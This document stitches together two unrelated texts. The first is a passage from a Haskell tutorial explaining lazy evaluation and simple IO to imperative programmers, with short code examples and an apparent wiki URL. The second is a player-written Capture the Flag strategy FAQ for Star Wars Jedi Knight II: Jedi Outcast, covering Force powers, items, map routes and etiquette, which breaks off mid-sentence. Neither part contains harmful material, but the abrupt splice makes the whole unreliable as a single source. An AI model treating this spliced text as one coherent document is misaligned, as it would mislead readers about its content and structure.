That said, forget about them. The problem is imperative-think. We wrote an imperative program in Haskell. See, it is possible to write imperative programs in Haskell! Easy, even. Now that you know you can, don’t. But it does no good for me to say, “stop thinking imperatively.” Habits of thought die hard. I have to give you something to replace it with. Haskell provides the means for you to organize your programs in new and exciting ways that really bear very little resemblance to what you’re used to doing in imperative languages. That could be a book. For right now, though, one of the things that makes IO seem difficult at first glance is a failure to appreciate the virtues of laziness. 3 Laziness I’m sure you’ve seen some attempts to explain laziness by way of apparently contrived examples involving infinite lists, but if you’re coming to Haskell from an imperative background you don’t get it. Trust me, you don’t. It is a simple idea with far-reaching implications and it is one of the defining features of the language. After learning Haskell, I’d rather gnaw off my own arm than try to live without laziness. So, what is it? First let’s deal with the notion of strictness. A language is strict if it evaluates the arguments to a function before it evaluates the function. A non-strict language doesn’t. For example, define f x y = x * y In a strict language a call to f would be evaluated as f (1+2) (3+4) = f 3 7 = 3 * 7 = 21 In a non-strict language that same call would be evaluated as f (1+2) (3+4) = (1+2) * (3+4) = 3 * 7 = 21 It looks like a small difference. To say that Haskell is lazy means that it is aggressively non-strict — it never evaluates anything before it absolutely needs to (unless you tell it otherwise, but that’s another story). This changes the way you code. Other languages have the occasional non-strict construct. Short-circuit booleans and ternary operators are very common and they let you write code such as if (i < x.size() && x[i] > 0) { which would otherwise explode. It’s a lot more convenient than nested ifs. Many languages let you create your own non-strict constructs, generally with macros, #define first(x, a, b) if (a > 0) x = a; else x = b first(x, a++, b++); In this horribly contrived example, b may never be incremented, depending on the value of a. That is, presumably, the programmer’s intent. There is also the obvious bug that a may well get incremented twice. Presumably, not the programmer’s intent. The example is deliberately sloppy to leave the door open for all kinds of other bugs the details of which aren’t really relevant. The point is that, in an imperative language, this kind of thing is very dangerous. This is why the use of macros is generally discouraged. The “solution” here is to use an inline function (or Lisp). The inline would eliminate all the bugs, but it would also enforce strict semantics — that is, it will fail to do the thing we had hoped to achieve by using a macro in the first place. There are a couple of points here. One is that while the notion of a non-strict operation may not seem mind-bending, coming from an imperative language it’s something you haven’t used much and therefore haven’t really internalized. The other is the relationship between laziness and side-effects. Clearly, they’re two great tastes that don’t go well together, like macaroni and blue-cheese dressing. Haskell can’t have side effects because the laziness ensures that you don’t know what’s happening or when. That’s a great thing! Wonderful! There’s no reason to get bogged down in those sorts of low-level details unless you absolutely need to. 4 IOWhat does this have to do with IO? While Hoogle-ing to find the do { s <- getContents ; return $ lines s } It’s the equivalent of @lines = <>; But no way do you want to do that. Slurp in and split an entire file, not knowing how big it is? That’s crazy talk, man! Or is it?It’s probably clear from context that, no, it’s not. So rather than writing code that interleaves input with processing with output as you’re used to, you can write code that does input and then does processing and then does output, and all the messy interleaving is handled by the lazy semantics of the language. It’s as if you’ve defined a collection of cooperating processes, producers and consumers, all running in lockstep. The solution is much more modular, and your program will still run in constant space and linear time. It’s the closest thing to magic that I know of. That’s what laziness buys you. Laziness enables a new kind of modularity that you may not have seen before. With laziness, you can easily separate generation from processing. When generation and processing are less tightly coupled both are freer to evolve. Let’s evolve the example. main = do s <- getContents let r = map processIt (lines s) putStr (unlines r) processIt s = show (length s) main = interact (unlines . map processIt . lines) interact f = do s <- getContents putStr (f s) main = interact (unlines . map processIt . lines) or main = io (map processIt) io f = interact (unlines . f . lines) That’s an idiomatic Haskell program for doing simple IO. You can find several more good examples here. To write these programs you don’t have to know a thing about monads. You do have to rethink your overall strategy for solving the problem. No more can you think about reading this and writing that, and all of that busy, busy “doing stuff.” Now you need to think in terms of describing the overall result that you want. That’s hard. Or, rather, it requires some practice. Once you’ve succeeded in thinking clearly in terms of the result you want to achieve without letting yourself get bogged down in the details of how to go about it, step by step, then the mechanics of making it happen are, frankly, trivial. 5 More I’m anticipating two possible reactions to the above code. You may think that it looks so simple that you have a hard time believing that it actually does anything. It’s deceptive, because the end result is actually easier than the corresponding code in an imperative language. Probably not what you were expecting when you came here. If this is the case, then reread the last few code blocks until you can see the flow. Alternately, you may think that this still counts as trivial, not really significantly different from “Hello, world”, and you want your money back. In that case, let’s crank up the heat. The rest of this will be more examples of increasing complexity and decreasing explanation. There’s more to life than standard input. Can’t we let the user specify input files on the command-line? import System.Environment main = do args <- getArgs mapM_ (interactFile (unlines . map processIt . lines)) args interactFile f fileName = do s <- readFile fileName putStr (f s) That processes each file individually, but maybe we’d rather do something more Perl-esque and treat all the command-line arguments as one big virtual file. main = do args <- getArgs interactFiles (unlines . map processIt . lines) args interactFiles f fileNames = do ss <- mapM readFile fileNames putStr $ f (concat ss) Don’t let it bother you. Nobody ever makes their first jump.But aren’t both these examples just so much hooey? There’s no error handling, and you never know what a user is going to type in. I suppose we could substitute for safeRead s = catch (readFile s) $ \_ -> return "" Contrasting this with Java is left as an exercise for the reader. Maybe line-by-line processing isn’t your thing. We could, just as an example, add up all the rows in our input main = interact $ show . sum . map read . lines Even by column. main = interact $ show . foldl addRows (repeat 0) . map row . lines addRows = zipWith (+) row = map read . words So far, so good. It’s easy to see how you can do simple file processing in Haskell. This is adequate for, say, reading and summarizing log files. What about something more interesting, such as configuration files? A configuration file is likely to have some sort of include mechanism In an imperative language sub processFile { open FH, shift; while () { if (&isInclude($_)) { &processFile(&includeFile($_)); } else { # other stuff } } close FH; } vs. readWithIncludes :: String -> IO [String] readWithIncludes f = do s <- readFile f ss <- mapM expandIncludes (lines s) return (concat ss) expandIncludes :: String -> IO [String] expandIncludes s = if isInclude s then readWithIncludes (includeFile s) else return [s] Two mutually recursive IO functions… You’ll note that this isn’t a simple use of recursion to express an iteration, as even the imperative solution is naturally expressed recursively. What’s much more important is that these functions are only doing IO. Processing is still “somewhere else,” not buried three levels deep inside an IO routine. This means that our new include file mechanism can be freely mixed with all the other techniques we’ve been developing with no loss of modularity. 6 Monads are Gravy The thing that makes IO in Haskell seem hard is learning to think in terms of a pure, lazy, functional language. If you can unlearn some old habits of thought it can be even easier than what you’re used to doing in imperative languages. I realize that’s like saying you can catch a bird if you put salt on its tail so I’ve tried to provide some help in that direction. The secret to success is to start thinking about IO as a result that you achieve rather than something that you do. Monadic IO is a formalization of that idea. We didn’t cover monads because they obscure the real challenges of just learning to think functionally, but they’re there to make your life easier. They add more power, letting you think about actions as tangible objects that you can manipulate and even letting you define your own control structures. You don’t need all of that power in order to just get started writing practical programs and doing useful work. Using just the techniques covered above (and maybe a dash of regular expressions) you can start to rock and roll.
http://www.haskell.org/haskellwiki/index.php?title=Haskell_IO_for_Imperative_Programmers&direction=prev&oldid=42244
CC-MAIN-2014-15
refinedweb
2,774
72.26
Customized List CheckBox control This project received 9 bids from talented freelancers with an average bid price of $132 USD.Get free quotes for a project like this Project Budget$30 - $250 USD Total Bids9 Project Description Need a customized list checkbox control. See attached snapshot. The control has to implement UserControl, IScriptControl interfaces. It has to be done from scratch, NO DEPENDENT controls are allowed to be used. On server side ([url removed, login to view]) it has to have Title getter/setter and List<FilterItem> Items getter/setter. FilterItem class is provided below: public class FilterItem { public string Title { get; set; } public string Href { get; set; } } On client side (Javascript) it has to handle checking/unchecking checkbox as well as control collapse/expand. So these should not postback. See the attached image to uinderstand. Also when control is generated (Render(...)) into html markup - no <table> tag is allowed, pls use <div> and CSS styling to get the
https://www.freelancer.com/projects/ASP-NET/Customized-List-CheckBox-control/
CC-MAIN-2016-50
refinedweb
159
65.93
When using Selenium 2.0 (WebDriver) you will sometimes find clicking a link opens a popup window. Before you can interact with the elements on the new window you need to switch to the new window. If the new window has a name you can use the name to switch to the popup window: driver.switchTo().window(name); However, if the window does not have a name you need to use the window handle. The problem is that every time you run the code the window handle will change. So you need to find the window handle for the popup window. To do this I use getWindowHandles() to find all the open windows, I click the link to open the new window. Next I use getWindowHandles() to get a second set of window handles. If I remove all the window handles of the first set from the second set I should end up with a set with only one element. That element will be the handle of the popup window. Here is the code: String getPopupWindowHandle(WebDriver driver, WebElement link) { // get all the window handles before the popup window appears Set<String> beforePopup = driver.getWindowHandles(); // click the link which creates the popup window link.click(); // get all the window handles after the popup window appears Set<String> afterPopup = driver.getWindowHandles(); // remove all the handles from before the popup window appears afterPopup.removeAll(beforePopup); // there should be only one window handle left if(afterPopup.size() == 1) { return (String)afterPopup.toArray()[0]; } return null; } To use this I simply call it with the WebElement which clicking opens the new window. You want to add some error handling to this but the basic idea of finding the popup window is here. To use the method I would use: String currentWindowHandle = driver.getWindowHandle(); String popupWindowHandle = getPopupWindowHandle(driver, link); driver.switchTo().window(popupWindowHandle); // do stuff on the pop window // close the popup window driver.switchTo().window(currentWindowHandle) 9 comments: Hi, Your Approach for handling Pop and Windows is very much help full for me. Thanks Happy Testing Thanks for the input. It helped a lot in shifting to new popup window which has no name. Hi Darrell, Your code works perfect with single popup window but could not able to use for multiple popup since the usage of removeAll(); Can you suggest a solution for multiple popup without using iterator.next(); since it is not consistent on InternetExplorerDriver(); Flow in navigation order: 1.Main Window 2.First Popup Window 3.Second Popup Window 4.First Popup Window 5.Main Window Shahul, The code helps you to find a new popup window. It is not meant to help you navigate a sequence of popups. Your example is missing some details. If you actual mean: 1. go to main window 2. click something which opens first popup window 3. go to first popup window 4. click something which opens second popup window 5. interact with second popup window 6. close second popup window 7. go to first popup window 8. close first popup window 9. go to main window My code would be used as follows: String mainHandle = driver.getWindowHandle(); WebElement firstPopup = driver.findElement(...); String firstPopupHandle = getPopupWindowHandle(driver, firstPopup); // does click driver.switchTo().window(firstPopupHandle); WebElement secondPopup = driver.findElement(...); String secondPopupHandle = getPopupWindowHandle(driver, secondPopup); // does click driver.switchTo().window(secondPopupHandle); // interact with second popup window // do something to close second window driver.switchTo().window(firstPopupHandle); // do something to close first window driver.switchTo().window(mainHandle); This assumes that the link/button to create the second popup window is on the first popup window. If you have any more questions, please post them to the WebDriver Google Group. It is easier to have an interactive conversation there. Thanks a ton. It perfectly worked. Thanks Darrel for the post, I am having problem in handling popups in my application, I have put SOP(driver.getWindowHandles.size()) before and after popup is opened , the value remains 1 So driver is not getting any popup to switch. Please help me in fixing this issue, as it becomes bottleneck for my testing where is getPopupWindowHandle defined? That's Good Approach to handle Pop-up. I'm currently facing problem with the flash player settings . Could you please let me know, how to handle for those kind of pop-up. Because selenium IDE is not recognizing the actions ,which i'm doing on that window.
https://darrellgrainger.blogspot.com/2012/04/how-to-find-popup-window-if-it-does-not.html?showComment=1364797989815
CC-MAIN-2022-27
refinedweb
732
60.41
Star Wars Jedi Knight II: Jedi Outcast: Capture the Flag FAQ by TripleEej Version: 1.0 | Updated: 2002-04-20 | Original File _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| _ _____ ____ ___ _ ___ _ ___ ____ _ _ _____ ___ ___ | | ____| _ \_ _| | |/ / \ | |_ _/ ___| | | |_ _| |_ _|_ _| _ | | _| | | | | | | ' /| \| || | | _| |_| | | | | | | | | |_| | |___| |_| | | | . \| |\ || | |_| | _ | | | | | | | \___/|_____|____/___| |_|\_\_| \_|___\____|_| |_| |_| |___|___| ____ _____ _____ _____ _ ___ / ___|_ _| ___| | ___/ \ / _ \ | | | | | |_ | |_ / _ \| | | | | |___ | | | _| | _/ ___ \ |_| | \____| |_| |_| |_|/_/ \_\__\_\ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| By: E.J. Downes (TripleEej) Version 1.0 (4/20/2002) _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| Table of Contents 1. Introduction 2. Basics 3. Useful Force Powers 4. Items 5. Map-Specific Strategies 6. Netiquette 7. Strategies From Other People 8. Credit/Props 9. Contact Information _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 1. Introduction If you already know Capture the Flag like the back of your hand, then you may just want to skip this FAQ. This is really intended for the rookie, the upstart...the complete and utter newbie. Anyone that hops around like a baboon on LSD only to get completely destroyed. Now that I've gotten the obligatory monkey reference out of the way, I'll tell you why I wrote this. This more or less started as a thread I made on the JKII Message Board on GameFAQs because I wanted to rant. You see, I had played quite a bit of CTF that day and had noticed one thing in particular: ABOUT 80% OF THE PEOPLE THAT PLAY CTF KIND OF SUCK. And it's not because they're bad at FPS games, either. Most of the time it just comes down to the fact that they play CTF like they would play a Free For All...they just try to kill people. Now, killing people is a very essential part of CTF. However, so is...well...CAPTURING THE FLAG. It's a simple concept, really. One that I'm surprised so few people understand. Still, it's a problem that needs to be addressed. So, as a public service to all of us (or not, depending on if you like totally 0wning people or not :) ), here is my FAQ for JK:JO CTF. _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 2. Basics You win by getting the flag back to base more than the other guy, but you can only score if your flag is at base. One or two people should be the "Flag Runner/Carriers". These people do nothing but go after the other team's flag. The others should be either helping the Runner/Carrier, or defending the base. A successful game means that everybody does ALL these things, not just one or two of them. I've had single games where I capped flags, defended the base, and helped out the carrier. To get the flag, you usually have to be: -HELPED BY TEAMMATES! I've gotten plenty of captures by myself, but they're about a million times easier if I have someone that has my back. -Good at running. If you don't have Force Speed at Level 3, forget about flag running. Just forget about it. Go defend the flag instead. Or support the flag carrier. Or pick up and never use vital items for the team (more on that later...) Or go to Taco Bell. -Sneaky. Running in guns-a-blazing doesn't work too well if the other team doesn't completely suck. The easiest way to get the flag is if they don't see you going for it until you have it already. If you are NOT the Flag Runner, then either HELP the Flag Runner or defend your flag. If you see the Flag Runner, get behind him and run backwards, shooting at anybody chasing the Carrier. Try to take shots for him--you are his personal Secret Service. :) If both teams have each other's flag, there are 3 basic roles the team must assume: -Flag Carrier: The flag carrier has a simple task: don't get killed! This is best accomplished by avoiding encounters with the enemy, and just running. However, if you're already back at your base, DON'T just run and hop around like a jackass. Monopolize the health and shields areas (your teammates don't need them--they'll respawn at base anyway so they won't be far away). Also, ATTACK anyone harassing you! Even though you have the flag, you are not some helpless little idiot. No doubt you probably have the best weapons (since you pretty much ran the length of the level twice) so you have the most potential to kick some ass! Finally, DO NOT go after the other Flag Carrier for ANY REASON! Even if you beat them, you still have to go all the way back to base again, and your flag can be re-stolen in the meantime. -Flag Defender: If everyone is off trying to get the flag back, the Flag Carrier is screwed. Have at least a couple of people PROTECT the flag! Ideally these people should be the best at "0wning" people, because in most situations they WILL be outnumbered. If you have light powers, use Team Heal on your carrier a lot, because he will need the help. -Flag Attacker: Alternatively, don't have everyone just sitting defending the Flag Carrier! You don't score points by defending (well, not for the team anyway). These people should probably be the best ones at just wreaking major havoc with rocket launchers and whatever that "Flak Cannon" thing is called. Scare the opposing Flag Carrier. Force them to make a mistake. Push them off a ledge. And focus ONLY on them. Don't go running off fighting one of the Flag Defenders--they'll just respawn at their base anyway! -Most of the times I've seen the other team (on on rare occasion, my team ;) ) get trashed at CTF is when they failed to divvy up the team like this. _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 3. Useful Force Powers Some Force powers are MADE for CTF. They make captures and defenses a LOT easier: -Force Speed: This is your best friend. Always have it on Level 3 if you can. Flag Running becomes a whole lot easier if you can run faster than anyone else. This is also useful for catching up to an opposing Flag Carrier and beating them down. -Force Pull: A defender's best friend. The lazy man's way of catching up with an opposing carrier. Also useful for screwing up people's jumps in places like Nar Shaddaa. -Force Push: Like Pull, it can really screw up people's jumps. It can also be used by defenders to push Flag Runners away from the Flag before they take it. Finally, it will send projectiles back towards whomever shot them! -Team Heal: This is a team game, right? RIGHT? Use this on your Carrier during those tense moments where both teams have each other's flags. -Force Grip: The way to piss people off. :) Grip the carrier and hack 'em to bits, or move them over a cliff and let go. -Force Jump: Useful for getaways, but only really needed in levels like Nar Shaddaa. The Achilles' heel of Force Jump is Force Push and Force Pull, because it's really easy to get thrown around when you're in midair. Still, give it at least one level because some shortcuts require a higher jump than the standard one. -Force Heal: In my opinion, it's really just better to use bacta or have someone else Team Heal you (you only really need healing if you have the flag in CTF), because not only does it eat up Force power and not give a lot in return (health only, not shields), but there is also a delay of about a second before it works, and you can get killed before it works (I know I have, anyway. :) ) -Jedi Mind Trick: This Force power makes you invisible to a certain umber of people, depending on what level it is on. Level 3 makes you invisible to the entire other team, but you must have one of them in your sights to activate it. -Force Lightning: It sure looks impressive, but the damage/Force consumption ratio is a bit high. It's still better than in JK1 where a single wussy bolt shot out, though. Somewhat useful when combined with Force Grip in levels without pits. -Dark Rage: It's hard to kill someone that has Dark Rage on. Dark Rage minimizes damage taken and speeds up everything you do. However, the cost is it almost completely eats away at your health (and you can't pick up more health when it's active), and when it does wear off, you get sluggish. If you see someone with Dark Rage, either push them off a ledge, completely barrage them with explosive weapons, or just wait until it wears off and do the weakest lightsaber strike. Dark Rage becomes very lethal when combined with Speed, as you will go faster than either one can by themselves. -Force Seeing: If you know someone is using Jedi Mind Trick, allocate some points to this so you can see them. Otherwise it's not terribly useful. -Force Drain: This is a valuable power to have if you defend. If the other team steals your flag, use it on their Flag Carrier so that their getaway will be harder. Also useful for Dark Side Carriers when they are running low on health, because it turns their Force energy into health for you. -Force Protect: Turns physical damage into Force damage. It's fine until you run out of Force and get killed. Don't bother. -Force Absorb: Turns Force power used against you and adds it to your Force meter, and also negates the effect. Cool, huh? It will suck down your Force energy, though. Turn it off when you don't use it. -Force Team Energize: Only useful if you're around the Flag Carrier. It'll restore other people's Force energy in return for your own energy, so give it to the Carrier so they can re-activate their Force Speed. _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 4. Items This is where I get ultra-ranty. Too many players do not know about the other items in the game. This is bad for two reasons: 1. All of the items are extremely useful in CTF, and 2. The players will PICK THEM UP ANYWAY JUST BECAUSE THEY ARE THERE, and then THEY WILL NEVER USE THE DAMN THINGS, MAKING ME WAIT FOR THE ITEMS TO RESPAWN!!!!! Whew. :) To use an item, hit the bracket keys [ and ] to scroll through the items, and hit Enter to use them. Here are the items and why I want you to use them if you pick them up: -Bacta Tanks: A travel-sized Force Heal for the masses! Use this when you're almost out of health, as it will completely refill it in multiplayer. B is the default hot-key. Flag Carriers should always have this. -Assault Sentry: Probably the Flag Defender's best friend. This is an automatic turret that will fire on any enemy that it sees. The best place to put these is in heavily travelled doorways near the flag, as it also gets in the way of would-be enemy Flag Carriers. -That cute little ball that shoots lasers: Remember that little ball that floated and shot at Luke when Obi-Wan was training him with the saber? Haha that thing nailed Luke good the little whiny... Anyways, this thing floats around your head for a limited time, shooting at any enemy it sees. This makes saber combat a lot easier, as your foe will spend time blocking the potshots it takes...until they get run through with your saber. :) -Force Enlightenment: This will give you all the powers on your side of the Force at their top levels. Useful if you didn't quite put enough on Grip. Note: do not confuse this with Force Boon--you do not have unlimited Force energy! -Force Boon: THIS one gives you temporary unlimited Force energy. This should be in the Flag Carrier's possession for obvious reasons. NOTE: this will not add to your Force energy if you have Speed, Absorb, Sight, Rage, etc. on. It only adds back to your Force energy when you AREN'T using a power. -Stationary Shield: I saved this for last because it's my favorite item. What this does is put up a big flat shield that only members of your team can cross. This is what the Flag Carrier should have in levels like Yavin, because it will completely stop anyone from chasing you. This is also good for stopping the enemy Flag carrier in Yavin by running in front of them and deploying it, thus making them have to either turn around and find another way out, or try and smash through it while you kill them. :) _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 5. Map-specific Strategies -Nar Shaddaa (Warring Factions): Take the high road if you want to get to the flag. Too many people spawn on the lower passages and it's very easy to get pushed or pulled off by someone above you. Try to kill enemy flag carriers before they make it to the middle of the map. The Flechette is very useful to Flag Defenders. If you snipe, there had better be someone else closer to the flag defending as it is almost impossible to catch up to an enemy Flag Carrier from the best place to snipe (right under the huge Imperial/New Republic emblems.) Force powers you NEED: Speed Push Pull Jump Grip Useful Force powers: Absorb Drain -Bespin (Bespin Exhaust Shafts): The best route I've found is NOT to cross the bridges in the middle. It's laughably easy to toss anyone off these. How should you get through there, then? First, take the way out of your base where you go down the stairs to where a couple of shield powerups are. Keep going straight and Force Jump into the little alcove in the enemy's base where the Thermal Detonators are (further in there's the zig-zaggy corridor, if that helps you get a picture at all). The most effective way to return is to then Force Jump across the gap to the little rectangular window where the sniper rifle is. You will have to hold down crouch and forward in order to fit inside of it, but you will have an almost guaranteed capture if you actually make it through. Stick the Assault Sentry right in the doorway to the flag platform to slow down enemy Flag Carriers. Only get tangled in the mess in the middle if you're a defender that wants to prevent the enemy from even entering your base. Either that or do what I do--wait in the doorway yourself, and whenever the enemy tries to go in, Force Pull them so they fall down, and then kill them however you like to kill people. :) Force powers you NEED: Speed Push Jump (if you want to try my shortcut) Useful Force powers: Drain Team Heal Lightning -Garrison 27-D: Take the high road on the catwalks, but don't go straight down the middle all the way. Make a right at the halfway point, then a left, and go through both doors to make flag capture MUCH easier. This level is probably the one where most likely BOTH flags will have been taken, so this is also where all of Part 1 comes into play (and also the reason I bothered to write all this up). There's a powerup that will give 200 shields just to the left (if you're facing the other team's base) near the big entrance to your base. Let the Flag Carrier have this. You will respawn in the same area if you die, but if the Carrier dies then the other team will more likely than not score. Don't be selfish about this. :) If you're the Flag Carrier, hanging around your base when both teams have the flag is a good way to get killed, because the other team will be rushing over there to get you, and there really isn't that much room to run away. Find a quiet spot somewhere in the level that isn't TOO far away should your teammates get your flag back. You'd be surprised how quickly the other team can "re-acquire" your flag if you dawdle. Force powers you NEED: Speed (Notice a pattern?) Pull Team Heal Useful Force powers: Jump Grip -Yavin (Temple Tournament): Flag Carriers trying to flee by going out the slow-opening doors in the middle of the base are likely to get a rocket up their behind. Go out one of the side doors, and deploy a Stationary Shield to keep people from chasing you. This is my favorite level because I can usually do this loop several times easily. If you're defending, place Trip Mines around the flag so that it will take at least two attackers to successfully get the flag, and stick some on the side entrances too if you have any. Make sure you let your own team know (team chat is the letter T) they're there, though! On that note, make sure that there are at least two of you going for the flag at any time. Use the mines effectively. I had one poor guy guessing all the time because I would mine different parts of the base. A good place to mine is the side doors because Flag Runners seem to prefer those doors to the slow-opening middle door. Also, it seems like 90% of the time the door they will come through is the one to the left (the one with the stationary shield and the repeater behind it). I don't know why, but it's true. If you're defending, a good tactic if someone gets the flag is to watch which side door they head towards, then go through the slow-opening middle door and head them off. Yes, this route will end up being faster despite the door, and you will catch the Runner by surprise because he will think everyone is BEHIND him. If you really want to be a sneaky bastard about it, quickly lay down a couple of Remote Mines and detonate them when he comes. :) Force powers you NEED: Speed Pull Drain Team Heal Useful Force powers: Push Grip Definately useful item: Stationary Shield _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 6. Netiquette I figure I might as well have a PSA about this, too. Some people really need to read this (well okay, MOST people do...) Don't whine about losing, or how your team sucks, or how TripleEej uses cheap tactics on Yavin. Nobody likes a crybaby. There is no Uber-weapon or Uber-power. Everything can be countered in the game. Saturday night I saw someone whine about how they were gonna play FFA, because there's "no one weapon wonders there like (name omitted)." If you keep falling victim to the same thing over and over, then maybe YOU should figure out how to counter it. Either that, or start using the tactic yourself. I sure didn't make up the shield tactic on Yavin--I saw someone else do it to me and I thought it was a good idea (no idea who it was though, or I'd give credit where credit's due). Don't badmouth your team. If they're doing something wrong, don't just say they all suck--TELL them what they should do. Why do you think I went to the trouble of writing this? :) Compliment your enemy if they do something that caught you totally off-guard. It's not much but it helps lighten the mood. Ask the other team what they did differently if you completely got trashed. Most people are more than willing to share their strategies with you. Don't boast excessively. Especially not if you just spent the whole time just engaging people in combat. CTF doesn't stand for "Kill The F'ers" because "Kill" starts with K, silly! ;) Don't switch teams just because they are winning. That's what sore losers do. You're not a sore loser, are you? Have fun, of course. Raven didn't make JK2 to piss you off. If you don't like the way things are going, switch servers or play the single player or go watch Hentai, you Hentai-watching freak! _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 7. Strategies From Other People I'm certainly not the definitive person to ask about CTF. Plenty of other people have good strategies. If you don't like mine, maybe some of these are better. NOTE: Most of this is compiled from the CTF Mini-FAQ thread on the JKII message board. I only included strategies that don't sound redundant compared to my FAQ (as it stands now. I've revised a few things since I originally wrote it.) All names are usernames from the GameFAQs message board. From Tommatt: "I agree ppl need to read this. PPl don't understand that you can't score ifyour flag isn't at your base. I've played many games where I go through all the work to get the flag back top base, and I'm holding on to i for over 5 minutes, because nobody bothers to kill their guy with our flag. I'm basically screaming at the team at this point. It happens quite often, as I seem adapt at sneaking into the base and getting back with the flag. One game my oppenent had the same problem, so if we each had the flag for over 3 minutes, we'd take turns getting killed so that somebody could score LOL. But defianately get in a defensive position. Don't engage in combat unless you have to. Get up on some high ground, when somebody jumps at at you, push em down, they'll go to where your teamates should be. Use your force powers to your advantage. I use dark side so I have drain, if I see somebody coming I always use drain even if I don't need health, steal their force power before they can use it on you. If all else fails, run to a new defensive position. Your teamates should help. THe main thing I see the newbies doing is just engaging anybody in combat, if they other team has your flag, don't engage someboyd in the middle of the map, push them down, keep running, get to the opposing flag carrior!" "When running back with a flag, pre plan your route if possible, and always try to pick a route that has med power ups, shield power ups, canisters, and always have a force field item on you when you grab a flag. It will delay pursuing greatly by dropping it at the right time. I try to have a forcefield on me when I get the flag, and hope one has respawned on my way back." From silentbill515: "Couple of other things that everyone needs to know. DON'T JOIN THE TEAM BECAUSE THE ALREADY HAVE A GOOD LEAD!!!! Just do Join Game and let it put you where it needs you. I had a 6 on 2 the other day. I ran around for over 5 minutes with our flag before I got overpowered. I looked to see where my team was and turns out it was just me and one other. Keep them somewhat even. It's a video game not game 7 of the Stanley Cup finals with the series all tied up and your in the 4th overtime! Sabers do have a place. Deflections. I've killed a LOT of people by running at them with my saber and just deflecting shots. If your the flag runner make sure you have Heal & Speed. These our your best friends (Light only of course). If your Dark then grab bacta tanks. Not as easy as the Light side but can still be done." From PSFreak: "Lets face it. Every game with a CTF mode has problems. Most people are complete and utter dumb asses when something requires teamwork. There are always a few freelancers that think they can do everything and they get shot down for it. I must say that I have always liked to be a runner in all CTF's and I have learned that you just have to be able to rely on yourself." From SeTSwiPe: "Speed R3 vs Rage I didn't have a stop watch (stupid cell phones making me think I don't need a watch) so I had to make due with a quartz metronome. At R3 Speed is faster than Rage. Of course I've only tested with R3 speed as of now. How much is it faster by? Not by very much. I tested this in Nar Shadaa by putting myself up to the wall near the cantina and counting the number of metronome tics it took to reach the other wall. It was only 1 tic or so. As far as which is better for ctf, it's up to you really. Rage does have the distinct advantage of faster RoF and reduced damage, so it might equal out. My advice, decide by the level, if the stage is fairly open, I'd sudgest Speed so you can run faster. If it's more corridor-like I'd sudgest rage, You'll have an easier time if you have a gun like the repeater firing faster. Speeed/Rage vs Rockets I tested by shooting the rocket and seeing if I could catch it. Both R3 Speed and Rage couldn't keep up. I did also notice that even if it's going forward, one can push the rocket so it moves another direction. I cannot tell if it's a random direction, or if it goes toward the nearest opponent since there were no opponents in the room. But since I've found this trick, I've added a new test to my list Lightning I haven't officially tested it, but the more I play online, the more I believe that it poisons you at a constant rate no matter what rank. I will also have to test to see if multiple Lightnings from different opponents add damage or not." "Rage Great for defense. Mostly because of the increased RoF. Imagine explosives coming out at double the RoF. Speed/Rage At R3 Speed, you run faster than normal when in the slowdown. It's slower than Rage, but still faster than normal. So a strat for running would be Rage, then changing to speed during the cooldown." From CrazyBallz: "rage3 vs speed3 Rage cost about 40% of ur force bar wen its full... and can pretty much catch up to speed3... not to sure... cuz people like to zigzag... but wen they run staright and ur following straight from behind with rage you have good chance to catch up and possible overtake them... as far as i figure for ctf... rage + speed will get the job down... get the flag... hit rage... run like no tomorrow... =) then wen slowmoenss begins hit force speed... well after that ur pretty much running a tad bit faster then normal... the sucky part is you have no mana..." "ohh yeah guys dont say to balance out the teams when you have people TKing the other side to help you out... thats wack... i figure its pretty balanced if the other team can score a point or two... is our fault if you dont have runners going in and out... people enjoy th game... guys chill with the smack talk if u really dont do neting... kinda gets annoying especially if your talking to your own teamates..." "well since your making a CTF guide... you can put this for uber defense.... =) For Light side... for force level jedi knight... JUMP level 3 PUSH level 3 PULL level 3 Speed level 1 to 3 (if possible) ABSORB Level 3 Protect level 1 to 3 (3 if Jedi Master) Mind trick level 3 Saber level 1 Saber defense level 3 well this build dominates for Nar Shada and Bespin for the Imperial level and Yavin... just walk around with a rocket launcher...that will pretty much do it for uber defensiveness... For Dark Side JUMP level 3 PUSH level 3 PULL level 3 Speed level 1 to 3 (if possible) RAGE Level 3 Drain level 1 to 3 (3 if Jedi Master) Grip level 3 Saber level 1 Saber defense level 3 same tactic as above but then you have grip foryavin and imperial... and if you do have drain... drain a person whos gunna get the flag it will screw them up so badly... its not even funnie... plus repeater has a sick rate of fire with rage.... ohhh the best way to catch up to a flag runner is speed3 and rage3... ull catch up to neone...in a matter of seconds... so just blast away... dont 4get the best defense is a good offense...own the other sides team.. and u wont have a problem... =)" From whoomp: "Just thought I'd add my two cents:) One thing to consider when thinking about rage vrs speed, is the lack of lightpowers you'll be missing out on by choosing a darkside ability. I find abilities like protection, heal, and absorb invaluable for flag capturing. More often than not the flag capturer is a lightside user, not a darkside one. On ledge-happy maps (nar-shadda, bespin come to mind), I'd rather have absorb to counter grip/drain than just push alone. I can't count the number of times people chase me with speed/drain, only to fill my meter so I can heal almost constantly :) Heal/Protection also helps sustain life those extra few seconds to make the cap, or for your defenders to deal with the threat. Rage is alot better for anti-flag captures, with the added 